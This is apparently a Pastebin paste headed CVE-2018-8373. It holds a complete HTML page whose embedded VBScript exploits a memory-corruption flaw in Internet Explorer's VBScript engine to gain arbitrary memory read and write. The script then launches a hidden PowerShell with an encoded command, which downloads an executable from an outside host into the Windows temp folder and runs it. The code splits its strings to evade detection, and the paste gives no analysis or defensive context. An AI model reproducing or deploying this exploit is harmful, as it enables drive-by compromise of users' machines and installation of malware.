Need a unique gift idea?
A Pastebin account makes a great Christmas gift
SHARE
TWEET

CVE-2018-8373

physicaldrive0 Sep 26th, 2018 2,113 Never
Upgrade to PRO!
ENDING IN00days00hours00mins00secs
 
  1. <!doctype html>
  2. <html lang="en">
  3. <head>
  4. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  5. <meta http-equiv="x-ua-compatible" content="IE=10">
  6. <meta http-equiv="Expires" content="0">
  7. <meta http-equiv="Pragma" content="no-cache">
  8. <meta http-equiv="Cache-control" content="no-cache">
  9. <meta http-equiv="Cache" content="no-cache">
  10. </head>
  11. <body>
  12.     <script type="text/vbscript">
  13.    
  14.     Dim max_col
  15.     Dim index_vul
  16.     Dim index_a
  17.     Dim index_b
  18.     Dim addr
  19.     Dim array()
  20.     Dim array2(0,6)
  21.     Dim util_mem
  22.     Dim fake_array
  23.     Dim fake_str
  24.  
  25.     Class Dummy
  26.         End Class
  27.  
  28.     Class ClassA
  29.         private Sub Class_Initialize
  30.             ReDim array(2)
  31.             'IsEmpty(array)
  32.         End Sub
  33.  
  34.         Public Default Property Get P
  35.             ReDim Preserve array(100000)
  36.  
  37.             For i = 0 To UBound(array2,2)
  38.                     array2(0,i) = 3
  39.                     Next
  40.             For i = 0 To UBound(array)
  41.                     array(i) = array2
  42.                     Next
  43.         P=&h0fffffff
  44.         End Property
  45.     End Class
  46.  
  47.     Function rw_primit()
  48.         array(index_vul)(index_a+2,0)=fake_array
  49.         array(index_b)(0,2)=CDbl("1.740885"+"34731"+"324E-310")
  50.  
  51.         array(index_vul)(index_a,0)=fake_str
  52.         array(index_b)(0,0)=CDbl("6.365"+"98737437"+"801E-314")
  53.  
  54.         util_mem=array(index_vul)(index_a,0)
  55.     End Function
  56.    
  57.     Function read
  58.         read=LenB(array(index_vul)(index_a+2,0)(util_mem+8))
  59.     End Function
  60.  
  61.     Function GetUnlt32(addr)
  62.         Dim value
  63.         array(index_vul)(index_a+2,0)(util_mem+8)=addr +4
  64.         array(index_vul)(index_a+2,0)(util_mem)=8
  65.         value=read()
  66.         array(index_vul)(index_a+2,0)(util_mem)=3
  67.         GetUnlt32 = value
  68.     End Function
  69.  
  70.     Set cls = New ClassA
  71.     array(2)=cls
  72.  
  73.     IsEmpty(array)
  74.    
  75.     max_col=&h0fffffff
  76.    
  77.    
  78.     For i=0 To UBound(array)
  79.         If UBound(array(i),1)-LBound(array(i),1)+1=max_col Then
  80.             index_vul=i
  81.             Exit For
  82.         End If
  83.     Next
  84.    
  85.    
  86.  
  87.     For i=0 To UBound(array(index_vul),1)
  88.         Dim type1 ,type2 ,type3 ,type4
  89.         type1=VarType(array(index_vul)(i,0))
  90.         type2=VarType(array(index_vul)(i+1,0))
  91.         type3=VarType(array(index_vul)(i+3,0))
  92.         type4=VarType(array(index_vul)(i+4,0))
  93.         If(type1 = 2 And type2 = 2 And type3 = 3 And type4 = 3) Then
  94.             index_a=i+3
  95.             array(index_vul)(index_a,0)="AAAA"
  96.             Exit For
  97.         End If
  98.     Next
  99.    
  100.     For i=0 To UBound(array,1)
  101.         If array(i)(0,0)=8 Then
  102.             index_b=i
  103.             Exit For
  104.         End If
  105.     next
  106.    
  107.  
  108.  
  109.     Set dm = New Dummy
  110.     Set array(index_vul)(index_a+4,0) = dm
  111.     array(index_b)(0,4) = CDbl("6.3659"+"87374378"+"01E-314") '3
  112.     addr=array(index_vul)(index_a+4,0)
  113.    
  114.  
  115.     fake_array=Unescape("%u0001%u0"+"880%u000"+"1%u0000%u0"+"000%u0000%u000"+"0%u0000%uffff%u"+"7fff%u00"+"00%u0000")
  116.     fake_str=Unescape("%u0000"+"%u0000%u"+"0000%u0000%u"+"0000%u0000"+"%u0000%"+"u0000")
  117.     rw_primit()
  118.    
  119.  
  120.     Dim psection
  121.     psection = GetUnlt32(addr+&hc)
  122.     dim a
  123.     a=psection+4
  124.  
  125.     Dim p_C0leScript
  126.     p_C0leScript=GetUnlt32(a)
  127.     a=p_C0leScript+&h174
  128.     array(index_vul)(index_a+2,0)(a-8)=0
  129.     Set Object = CreateObject("Sh"+"ell.Appl"+"ication")
  130.   Object.ShellExecute "powe"+"rshel"+"l.ex"+"e -Window"+"Style Hi"+"dden -encod"+"edCo"+"mmand ""KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAG0AeQBzAHcAYwBkAC4AYwBvAG0ALwB2AG8AbAAvAHMAMQAuAGUAeABlACcALAAgACcAYwA6AC8AdwBpAG4AZABvAHcAcwAvAHQAZQBtAHAALwBhAHQAdQBtADIAbAAuAGUAeABlACcAKQA7AGMAOgAvAHcAaQBuAGQAbwB3AHMALwB0AGUAbQBwAC8AYQB0AHUAbQAyAGwALgBlAHgAZQA="""
  131.  
  132.     </script>
  133. </body>
  134. </html>
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top